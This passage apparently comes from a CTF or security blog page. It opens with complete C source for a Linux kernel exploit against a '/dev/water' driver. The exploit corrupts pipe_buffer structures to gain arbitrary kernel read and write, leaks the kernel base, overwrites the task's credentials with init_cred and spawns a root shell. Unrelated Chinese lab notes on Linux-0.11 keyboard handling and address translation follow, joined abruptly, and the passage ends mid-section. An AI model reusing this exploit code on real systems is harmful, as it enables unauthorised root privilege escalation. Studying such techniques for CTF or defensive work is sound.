 * core: index of the CPU to run on.
 *
 * The result of sched_setaffinity() is not inspected; the message is printed
 * regardless.
 */
void bind_core(int core){
    cpu_set_t allowed;
    pid_t self = getpid();

    CPU_ZERO(&allowed);
    CPU_SET(core, &allowed);

    sched_setaffinity(self, sizeof(allowed), &allowed);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/*
 * Hex-dump `size` bytes starting at `p`, one 8-byte row per line: the row
 * offset, the eight individual bytes, then the same bytes as one native word.
 *
 * p:    start of the region to dump.
 * size: number of bytes; must be a multiple of sizeof(void *).
 *
 * Returns 1 without printing anything when size is not a multiple of
 * sizeof(void *), otherwise 0.
 *
 * Each row prints eight bytes, so the layout assumes 8-byte pointers.
 */
int print_hex(void *p, int size)
{
    const unsigned char *buf = (const unsigned char *)p;
    int i;

    if (size % sizeof(void *))
    {
        return 1;
    }

    printf("--------------------------------------------------------------------------------\n");
    for (i = 0; i < size; i += sizeof(void *)) {
        unsigned long word;

        /* memcpy instead of a pointer cast: the input may be unaligned and
         * is not necessarily an unsigned long object. */
        memcpy(&word, &buf[i], sizeof(word));

        printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
               i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], word);
    }
    return 0;
}

/*
 * Report a fatal error and terminate the process.
 *
 * msg: short description of the failing step.
 *
 * Pauses for two seconds before exiting with EXIT_FAILURE; never returns.
 */
void errPrint(char *msg)
{
    const unsigned int pause_seconds = 2;

    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(pause_seconds);
    exit(EXIT_FAILURE);
}

size_t user_cs, user_ss, user_rflags, user_sp;
/*
 * Snapshot the current user-mode cs, ss, rsp and rflags into the globals
 * user_cs, user_ss, user_sp and user_rflags, then print a confirmation.
 *
 * NOTE(review): the operands are written destination-first (Intel order), so
 * this presumably has to be built with -masm=intel -- confirm against the
 * build command.
 */
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

/*
 * Final stage: verify that the process now runs as uid 0 and, if so, hand
 * control to an interactive shell.
 *
 * Never returns: exits with EXIT_FAILURE (after a 5 second pause) when the
 * uid is still non-zero, and with EXIT_SUCCESS once the shell terminates.
 */
void get_root(void)
{
    uid_t uid = getuid();

    if (uid != 0) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    exit(EXIT_SUCCESS);
}


/*
 * Userspace copy of a pipe_buffer record as read from / written to the pipes
 * in this program. Field order and sizes are significant: instances are
 * transferred byte-for-byte with read()/write().
 * NOTE(review): presumably mirrors the target kernel's struct pipe_buffer --
 * confirm against the kernel headers for the version under test.
 */
struct pipe_buffer {
struct page *page; /* page pointer carried by the record */
unsigned int offset, len; /* start offset and length within the page */
const struct pipe_buf_operations *ops; /* operations table pointer */
unsigned int flags;
unsigned long private;
};

/*
 * Table of four function pointers referenced by pipe_buffer.ops. Only the
 * pointer value is copied around by this program; none of the callbacks is
 * invoked from user space here.
 */
struct pipe_buf_operations {
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#define PIPE_NUM 200
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

int self_4th_pipe_idx = -1;
int self_2nd_pipe_idx = -1;
int self_3rd_pipe_idx = -1;
struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
char temp_zero_buf[0x1000] = {'\0'};

int pipe_list[PIPE_NUM][2];

/*
 * Arbitrary-read primitive: points a forged pipe_buffer at page_to_read and
 * reads from the pipe at self_2nd_pipe_idx.
 *
 * page_to_read: struct page pointer stored into evil_2nd_buf.page.
 * dst:          destination; the final read() asks for 0xfff bytes, so dst
 *               must be able to hold at least 0xfff bytes.
 *
 * The sequence of write() calls is order-dependent; do not reorder.
 */
void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

/* Push evil_4th_buf through the pipe at self_3rd_pipe_idx. */
write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* Push the forged record, then zero padding up to TRD_PIPE_BUF_SZ bytes, through the pipe at self_4th_pipe_idx. */
write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

/* Follow with evil_3rd_buf on the same pipe. */
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

/* The actual read of the target page's contents. */
read(pipe_list[self_2nd_pipe_idx][0], dst, 0xfff);
}

/*
 * Arbitrary-write primitive: points a forged pipe_buffer at page_to_write and
 * writes len bytes from src into the pipe at self_2nd_pipe_idx.
 *
 * page_to_write: struct page pointer stored into evil_2nd_buf.page.
 * src, len:      data and byte count handed to the final write().
 *
 * The sequence of write() calls is order-dependent; do not reorder.
 */
void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

/* Push evil_4th_buf through the pipe at self_3rd_pipe_idx. */
write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* Push the forged record, then zero padding up to TRD_PIPE_BUF_SZ bytes, through the pipe at self_4th_pipe_idx. */
write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

/* Follow with evil_3rd_buf on the same pipe. */
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

/* The actual write into the target page. */
write(pipe_list[self_2nd_pipe_idx][1], src, len);
}

/*
 * Translate an address inside the direct mapping into the address of the
 * corresponding 0x40-byte entry in the vmemmap array.
 *
 * direct_map_addr: address at or above the global page_offset_base.
 *
 * Returns vmemmap_base + 0x40 * (4 KiB page index relative to
 * page_offset_base).
 */
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    size_t page_start = direct_map_addr & (~0xfff);
    size_t page_index = (page_start - page_offset_base) / 0x1000;

    return vmemmap_base + page_index * 0x40;
}

/*
 * Program entry point.
 *
 * Stages, in order (the sequence of pipe operations is significant):
 *   1. open /dev/water and issue the preparatory ioctls;
 *   2. create PIPE_NUM pipes, resize them and tag each with its own index;
 *   3. trigger ioctl 0x50 and find two pipes that now read the same page;
 *   4. repeat the free / resize / re-read cycle to build three self-writing
 *      pipes (self_2nd/3rd/4th_pipe_idx);
 *   5. use the read primitive to locate the kernel base and this task;
 *   6. use the write primitive to patch the task's credential pointers;
 *   7. call get_root().
 *
 * Differences from the previous revision (bug fixes only):
 *   - page-sized reads/writes use a dedicated 0x2000-byte buffer instead of
 *     overflowing the 0x200-byte stack buffer `buf`;
 *   - the task-name search compares exactly strlen(target)+1 bytes instead of
 *     0xd bytes (which read uninitialised stack bytes past the string);
 *   - candidate matches too close to the start of the scanned page are
 *     skipped instead of indexing before the buffer;
 *   - open(), malloc() and the self-writing pipe searches are checked;
 *   - the first summary line is labelled init_task instead of printing
 *     init_cred twice.
 */
int main() {
    save_status();
    bind_core(0);

    int fd = open("/dev/water",O_RDWR);
    if (fd < 0){
        errPrint("open /dev/water");
    }

    char buf[0x200];

    /* Two pages of scratch space for the read/write primitives: each
     * primitive call moves up to 0xfff bytes, and two consecutive pages of
     * the task are handled at offsets 0 and 0x1000. */
    static uint64_t page_words[0x2000 / sizeof(uint64_t)];
    char *page_buf = (char *)page_words;

    memset(buf,0x31,0x200);
    ioctl(fd,0x20,&buf);
    ioctl(fd,0x30,&buf);

    for(int i = 0; i < PIPE_NUM; i++){
        if(pipe(pipe_list[i]) == -1){
            errPrint("pipe");
        }
    }

    for (int i = 0; i < PIPE_NUM; i++){
        if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 8) < 0){
            /* 8 * pipe_buffer = 0x180 kmalloc-512 */
            errPrint("fcntl");
        }
    }

    for (int i = 0; i < PIPE_NUM; i++){
        write(pipe_list[i][1], "AAAAAAAA", 8); // tag
        write(pipe_list[i][1], &i, sizeof(int));
        write(pipe_list[i][1], &i, sizeof(int));
        write(pipe_list[i][1], &i, sizeof(int));
        write(pipe_list[i][1], "AAAAAAAA", 8);
        write(pipe_list[i][1], "BBBBBBBB", 8);
    }

    memset(buf,0,0x200);
    ioctl(fd,0x50,&buf); /* write-up: overwrites the trailing byte of a pipe_buffer->page */

    int victim_idx = -1;
    int orig_idx = -1;
    for (int i = 0; i < PIPE_NUM; i++){
        char tag[0x10];
        int nr = i; /* stays equal to i if the read below comes up short */
        memset(tag, 0, sizeof(tag));
        read(pipe_list[i][0], tag, 8);
        read(pipe_list[i][0], &nr, sizeof(int));
        if (!strcmp(tag, "AAAAAAAA") && nr != i){
            orig_idx = nr;
            victim_idx = i;
            printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",victim_idx, orig_idx);
        }
    }
    if (orig_idx == -1 || victim_idx == -1){
        errPrint("can't find");
    }

    struct pipe_buffer info_pipe_buf;
    size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));

    memset(buf,'p',sizeof(buf));
    write(pipe_list[victim_idx][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));
    close(pipe_list[orig_idx][0]); /* releases one of the two pipe_buffers sharing the page */
    close(pipe_list[orig_idx][1]);

    puts("write down");

    for (int i = 0; i < PIPE_NUM; i++){
        if (i == orig_idx || i == victim_idx){
            continue;
        }
        if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0){
            /* 2 * pipe_buffer = 0x60 kmalloc-96 */
            errPrint("Fcntl Pipe");
        }
    }

    memset(buf,0,sizeof(buf));
    read(pipe_list[victim_idx][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
    print_hex(buf,SND_PIPE_BUF_SZ - 8);
    read(pipe_list[victim_idx][0], &info_pipe_buf, sizeof(info_pipe_buf));
    print_hex((char*)&info_pipe_buf,sizeof(info_pipe_buf));

    printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
           "\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
           info_pipe_buf.page, info_pipe_buf.ops);

    info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);
    write(pipe_list[victim_idx][1], &info_pipe_buf, sizeof(info_pipe_buf));
    puts("change pipe_buffer down");

    int snd_orig_idx = -1;
    int snd_victim_idx = -1;
    for (int i = 0; i < PIPE_NUM; i++){ /* second spray */
        int nr = i; /* stays equal to i if the read below comes up short */
        if (i == orig_idx || i == victim_idx){
            continue;
        }
        read(pipe_list[i][0], &nr, sizeof(int));
        if (i < PIPE_NUM && i != nr){
            snd_orig_idx = nr;
            snd_victim_idx = i;
            printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",snd_victim_idx, snd_orig_idx);
        }
    }

    if (snd_orig_idx == -1 || snd_victim_idx == -1){
        errPrint("can't find");
    }

    size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
    struct pipe_buffer evil_pipe_buf;
    struct page *page_ptr;

    memset(buf,'k',sizeof(buf));
    write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));
    close(pipe_list[snd_orig_idx][0]);
    close(pipe_list[snd_orig_idx][1]);

    puts("write down");

    for (int i = 0; i < PIPE_NUM; i++){
        if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
            continue;
        }

        if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0){
            /* 4 * pipe_buffer = 0xc0 kmalloc-192 */
            errPrint("Fcntl Pipe");
        }
    }

    puts("fcntl down");

    evil_pipe_buf.page = info_pipe_buf.page;
    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.ops = info_pipe_buf.ops;
    evil_pipe_buf.flags = info_pipe_buf.flags;
    evil_pipe_buf.private = info_pipe_buf.private;

    write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));
    puts("change pipe_buffer down");

    /* First self-writing pipe: the one whose leading qword now equals the forged page pointer. */
    for (int i = 0; i < PIPE_NUM; i++){
        if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
            continue;
        }

        read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
        printf("%p\n",page_ptr);
        if (page_ptr == evil_pipe_buf.page){
            self_2nd_pipe_idx = i;
            printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m%d\n",
                   self_2nd_pipe_idx);
            break;
        }
    }
    if (self_2nd_pipe_idx == -1){
        errPrint("can't find self-writing pipe");
    }

    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

    memset(buf,'n',sizeof(buf));
    write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
    write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

    puts("change pipe_buffer down");

    /* Second self-writing pipe. */
    for (int i = 0; i < PIPE_NUM; i++){
        if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx){
            continue;
        }

        read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
        printf("%p\n",page_ptr);
        if (page_ptr == evil_pipe_buf.page){
            self_3rd_pipe_idx = i;
            printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
                   "%d\n",
                   self_3rd_pipe_idx);
            break;
        }
    }
    if (self_3rd_pipe_idx == -1){
        errPrint("can't find self-writing pipe");
    }

    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

    memset(buf,'m',sizeof(buf));
    write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
    write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

    puts("change pipe_buffer down");

    /* Third self-writing pipe. */
    for (int i = 0; i < PIPE_NUM; i++){
        if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx || i == self_3rd_pipe_idx){
            continue;
        }

        read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
        printf("%p\n",page_ptr);
        if (page_ptr == evil_pipe_buf.page){
            self_4th_pipe_idx = i;
            printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
                   "%d\n",
                   self_4th_pipe_idx);
            break;
        }
    }
    if (self_4th_pipe_idx == -1){
        errPrint("can't find self-writing pipe");
    }

    /* Templates used by arbitrary_read_by_pipe()/arbitrary_write_by_pipe(). */
    memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
    memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
    memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

    evil_2nd_buf.offset = 0;
    evil_2nd_buf.len = 0xff0;

    evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
    evil_3rd_buf.len = 0;

    write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));
    puts("change pipe_buffer down");

    evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
    evil_4th_buf.len = 0;

    /* Walk candidate vmemmap bases downwards in 0x10000000 steps until the
     * page at index 157 starts with a kernel-text-looking pointer ending in 0x0e0. */
    vmemmap_base = (size_t)info_pipe_buf.page & 0xfffffffff0000000;
    for (;;)
    {
        uint64_t first_qword;

        arbitrary_read_by_pipe((struct page *)(vmemmap_base + 157 * 0x40), page_buf);
        memcpy(&first_qword, page_buf, sizeof(first_qword));

        if (first_qword > 0xffffffff81000000 && ((first_qword & 0xfff) == 0x0e0))
        {
            kernel_base = first_qword - 0x0e0;
            kernel_offset = kernel_base - 0xffffffff81000000;
            printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
                   "\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
                   kernel_base, kernel_offset);
            break;
        }

        vmemmap_base -= 0x10000000;
    }
    printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);


    uint64_t parent_task, current_task;
    puts("[*] Seeking task_struct in memory...");

    uint64_t *comm_addr = 0;
    uint64_t *point_buf = malloc(0x1000);
    if (point_buf == NULL){
        errPrint("malloc");
    }

    char target[0x20];
    strcpy(target, "8888888888");
    if (prctl(PR_SET_NAME, target, 0, 0, 0) != 0){
        errPrint("cannot set name");
    }

    /* Compare the name including its terminating NUL, and nothing beyond it. */
    const size_t target_len = strlen(target) + 1;
    /* The checks below look up to 60 qwords before the match. */
    const size_t min_match_off = 60 * sizeof(uint64_t);

    for (int i = 0; 1; i++)
    {
        arbitrary_read_by_pipe((struct page *)(vmemmap_base + i * 0x40), point_buf);

        comm_addr = memmem(point_buf, 0xf00, target, target_len);
        /* NOTE(review): the last bound (0xffff888000) is shorter than the
         * other three -- possibly a typo for 0xffff888000000000; left as is. */
        if (comm_addr
            && (size_t)((char *)comm_addr - (char *)point_buf) >= min_match_off
            && (comm_addr[-2] > 0xffff888000000000) && (comm_addr[-3] > 0xffff888000000000) && (comm_addr[-57] > 0xffff888000000000) && (comm_addr[-56] > 0xffff888000))
        {

            parent_task = comm_addr[-60];

            current_task = comm_addr[-54] - 2528;
            page_offset_base = (comm_addr[-54] & 0xfffffffffffff000) - i * 0x1000;
            page_offset_base &= 0xfffffffff0000000;

            printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
                   (struct page *)(vmemmap_base + i * 0x40));
            printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
                   page_offset_base);
            printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m"
                   "0x%lx\n\n",
                   current_task);
            break;
        }
    }
    (void)parent_task;

    size_t *tsk_buf;
    uint64_t init_task = 0xffffffff83011200+kernel_offset;
    uint64_t init_cred = 0xffffffff8308c620+kernel_offset;
    uint64_t init_nsproxy = 0xffffffff8308c140+kernel_offset;

    printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
    printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
    printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n", init_nsproxy);

    puts("[*] Escalating ROOT privilege now...");

    size_t current_task_page = direct_map_addr_to_page_addr(current_task);

    /* Fetch the two consecutive pages holding the task into page_buf[0..0x1fff]. */
    arbitrary_read_by_pipe((struct page *)current_task_page, page_buf);
    arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), page_buf + 0x1000);

    tsk_buf = (size_t *)(page_buf + (current_task & 0xfff));
    tsk_buf[367] = init_cred;
    tsk_buf[368] = init_cred;
    tsk_buf[381] = init_nsproxy;

    arbitrary_write_by_pipe((struct page *)current_task_page, page_buf, 0xff0);
    arbitrary_write_by_pipe((struct page *)(current_task_page + 0x40), page_buf + 0x1000, 0xff0);

    puts("[+] Done.\n");
    puts("[*] checking for root...");

    get_root();

    return 0;
}

HIT-OSLab7

实验目的:

  • 加深对操作系统设备管理基本原理的认识,了解键盘中断、扫描码等概念
  • 通过实践掌握 Linux-0.11 对键盘终端和显示器终端的处理过程

实验内容:

  • 本实验的基本内容是修改 Linux-0.11 的终端设备处理代码,对键盘输入和字符显示进行非常规的控制
  • 在初始状态,一切如常,用户按一次 F12 后,把应用程序向终端输出所有字母都替换为 *
  • 再按一次 F12,又恢复正常
  • 第三次按 F12,再进行输出替换,依此类推

实验过程

终端设备是计算机系统中与用户交互的硬件设备,通常使用键盘和显示器来接收用户的输入和输出操作

在 Linux 系统中,每个终端设备都对应一个 tty_struct 结构体实例,用于存储该终端设备的状态、配置信息以及与终端相关的数据结构

1
2
3
4
5
6
7
8
9
10
/* Per-terminal state: attributes, owning process group, and the three character queues. */
struct tty_struct
{
struct termios termios; /* terminal attributes */
int pgrp; /* process group the terminal belongs to */
int stopped; /* whether the terminal is currently stopped */
void (*write)(struct tty_struct *tty); /* routine that performs output for this terminal */
struct tty_queue read_q; /* input queue (data coming from the keyboard) */
struct tty_queue write_q; /* output queue (data that will be shown on screen) */
struct tty_queue secondary; /* secondary queue; NOTE(review): believed to hold the processed ("cooked") input in Linux 0.11 rather than data from other devices -- confirm */
};
1
2
3
4
5
6
7
8
/* Character queue used by tty_struct for its read, write and secondary queues. */
struct tty_queue
{
unsigned long data;
unsigned long head; /* head position within buf */
unsigned long tail; /* tail position within buf */
struct task_struct *proc_list; /* list of tasks associated with this queue (presumably waiters -- confirm) */
char buf[TTY_BUF_SIZE]; /* storage for the queued characters */
};

扫描码是指计算机在接收用户的输入时,将用户的输入转换为计算机能够理解的形式,在键盘上,每个键都对应一个唯一的扫描码,这个扫描码可以用来识别用户按下的是哪个键

在操作系统中,键盘中断通常是通过中断处理程序(Interrupt Handler)来实现的

  • 当用户按下键盘上的键时,计算机系统会向操作系统发送一个中断信号,操作系统接收到这个信号后,会调用相应的中断处理程序来处理这个中断事件

下面是键盘中断的处理程序代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
/*
 * Keyboard interrupt handler: reads one scan code from port 0x60, dispatches
 * it through key_table, acknowledges the keyboard and the interrupt
 * controller, then calls do_tty_interrupt(0).
 */
keyboard_interrupt:
pushl %eax
pushl %ebx
pushl %ecx
pushl %edx
push %ds
push %es
movl $0x10,%eax /* selector 0x10 is loaded into ds and es below (presumably the kernel data segment) */
mov %ax,%ds
mov %ax,%es
xor %al,%al
inb $0x60,%al /* al = scan code read from port 0x60; the rest of eax is zero */
cmpb $0xe0,%al /* 0xe0 / 0xe1 are prefix codes: only record them in e0 */
je set_e0
cmpb $0xe1,%al
je set_e1
call key_table(,%eax,4) /* call the handler stored at key_table + eax*4 */
movb $0,e0 /* prefix state is consumed by the key just handled */
e0_e1: inb $0x61,%al /* set then clear bit 7 of port 0x61; the jmp pairs are short delays */
jmp 1f
1: jmp 1f
1: orb $0x80,%al
jmp 1f
1: jmp 1f
1: outb %al,$0x61
jmp 1f
1: jmp 1f
1: andb $0x7F,%al
outb %al,$0x61
movb $0x20,%al
outb %al,$0x20 /* write 0x20 to port 0x20 (presumably end-of-interrupt to the interrupt controller) */
pushl $0 /* argument 0 for do_tty_interrupt */
call do_tty_interrupt /* write-up: copies the received data into the canonical-mode character queue */
addl $4,%esp
pop %es
pop %ds
popl %edx
popl %ecx
popl %ebx
popl %eax
iret
set_e0: movb $1,e0
jmp e0_e1
set_e1: movb $2,e0
jmp e0_e1

其中 key_table 存储有各个扫描码的处理程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
key_table:
.long none,do_self,do_self,do_self /* 00-03 s0 esc 1 2 */
.long do_self,do_self,do_self,do_self /* 04-07 3 4 5 6 */
.long do_self,do_self,do_self,do_self /* 08-0B 7 8 9 0 */
.long do_self,do_self,do_self,do_self /* 0C-0F + ' bs tab */
......
.long func,func,func,func /* 3C-3F f2 f3 f4 f5 */
.long func,func,func,func /* 40-43 f6 f7 f8 f9 */
.long func,num,scroll,cursor /* 44-47 f10 num scr home */
.long cursor,cursor,do_self,cursor /* 48-4B up pgup - left */
.long cursor,cursor,do_self,cursor /* 4C-4F n5 right + end */
.long cursor,cursor,cursor,cursor /* 50-53 dn pgdn ins del */
.long none,none,do_self,func /* 54-57 sysreq ? < f11 */
.long func,none,none,none /* 58-5B f12 ? ? ? */
......
  • 我们可以发现 F12 会调用 func 函数

核心思路就是添加一个 F12 标记位,我们可以选择将 func 替换为我们需要的函数,其目的是修改该标记位以记录用户是否输入了 F12

1
2
3
4
5
/* F12 state flag: 0 = normal output, 1 = output is masked with '*'. */
int f12_key = 0;

/*
 * Key handler meant to be installed in key_table for the F12 scan code:
 * flips the lowest bit of f12_key on every call.
 */
void change_f12_key(void)
{
    f12_key = f12_key ^ 1;
}
1
.long change_f12_key,none,none,none		/* 58-5B f12 ? ? ? */

函数 con_write 用于将字符串写入终端设备:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
void con_write(struct tty_struct * tty)
{
int nr;
char c;

nr = CHARS(tty->write_q);
while (nr--) {
GETCH(tty->write_q,c);
switch(state) {
case 0:
if (c>31 && c<127) {
if (x>=video_num_columns) {
x -= video_num_columns;
pos -= video_size_row;
lf();
}
/* 将write_q的字符放入显存的汇编代码 */
__asm__("movb attr,%%ah\n\t"
"movw %%ax,%1\n\t"
::"a" (c),"m" (*(short *)pos)
);
pos += 2;
x++;
} else if (c==27)
  • case 0 用于处理 ASCII 码在 (31,127) 范围内的可打印字符
  • 我们需要在这段代码前检查 f12_key 并将字符设置为 *
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
void con_write(struct tty_struct * tty)
{
int nr;
char c;

nr = CHARS(tty->write_q);
while (nr--) {
GETCH(tty->write_q,c);
switch(state) {
case 0:
if (c>31 && c<127) {
if (x>=video_num_columns) {
x -= video_num_columns;
pos -= video_size_row;
lf();
}
if(f12_key == 1 && ( (c >= 48 && c<= 57) || (c>=65 && c<=90) || (c>=97 && c<=122) ) )
c = '*';

__asm__("movb attr,%%ah\n\t"
"movw %%ax,%1\n\t"
::"a" (c),"m" (*(short *)pos)
);
pos += 2;
x++;
} else if (c==27)

最终效果如下:

HIT-OSLab6

实验目的:

  • 深入理解操作系统的段、页式内存管理,深入理解段表、页表、逻辑地址、线性地址、物理地址等概念
  • 实现段、页式内存管理的地址映射过程
  • 编程实现段、页式内存管理上的内存共享,从而深入理解操作系统的内存管理

实验内容:

  • 用 Bochs 调试工具跟踪 Linux-0.11 的地址翻译(地址映射)过程,了解 IA-32(Intel Architecture 32-bit) 的CPU架构下的地址翻译
  • 在 Linux-0.11 中实现基于页的共享内存机制,具体来说就是实现如下2个系统调用:
    • sys_shmget:获取一个共享内存块
    • sys_shmat:映射一个共享内存块
  • 在 Ubuntu 上编写多进程的生产者-消费者程序,用共享内存做缓冲区(上一个实验是用文件做缓冲区)
  • 在上一个实验(信号量的实现和在 pc.c 程序上的应用)的基础上,为 Linux-0.11 增加共享内存功能,并将生产者-消费者程序移植到 Linux-0.11

实验过程

本实验基于上个实验,因此需要保存上个实验的代码

逻辑地址,虚拟地址,线性地址,物理地址是计算机内存管理中的重要概念:

  • 逻辑地址:
    • 逻辑地址是程序使用的地址
    • 编译器编译程序时,会为程序生成代码段和数据段,然后将所有代码放到代码段中,将所有数据放到数据段中,最后程序中的每句代码和每条数据都会有自己的逻辑地址
  • 虚拟地址:
    • 虚拟地址是操作系统为每个进程分配的地址空间,保证了进程之间的隔离和安全性
  • 线性地址:
    • 由虚拟地址通过 “分段” / “分页” 机制转换而来的地址
  • 物理地址:
    • 物理地址是指内存中的实际地址,它是硬件访问的地址
    • 如果 CPU 没有分页机制,那么线性地址等于物理地址
    • 如果 CPU 有分页机制,那么线性地址必须通过转换才能变成物理地址

逻辑地址,虚拟地址,线性地址,物理地址之间的关系是:

  • 在程序编写时,汇编指令使用的地址为逻辑地址(编译器为各个符号分配的地址)
  • 当程序被加载到内存中时,操作系统会将逻辑地址转化为虚拟地址
  • 在 x86 架构中:
    • 虚拟地址通过段选择器和段描述符转化为线性地址
    • 线性地址通过页表转化为物理地址

实验要求跟踪调试 Linux-0.11 的地址映射过程,测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
#include <stdio.h>

int i = 0x12345678;

/*
 * Address-translation test program: prints the address of the global `i`
 * and then spins for as long as `i` is non-zero.
 */
int main(void)
{
/* NOTE(review): %08x expects an unsigned int while &i is an int *; this
 * relies on pointers and ints having the same size on the target. */
printf("LQD The logical/virtual address of i is 0x%08x", &i);
fflush(stdout);

/* Busy-wait; the loop only ends if something outside the program clears i. */
while (i);

return 0;
}
  • 运行后程序死循环

我们的目标就是调试分析变量 i 的物理地址,修改该地址使程序停止死循环:

  • 程序运行之后输出的 0x3004 就是变量 i 的虚拟地址

线性地址由段选择器和段描述符计算而来,因此我们需要先查找到段描述符

进程的段描述符记录在该进程的 LDT 表中,而 LDT 表则记录在 GDT 表中(LDTR 寄存器记录 LDT 表存放在 GDT 表的位置,GDTR 寄存器则记录有 GDT 表的物理地址)

sreg 命令可以显示所有寄存器的信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<bochs:3> sreg
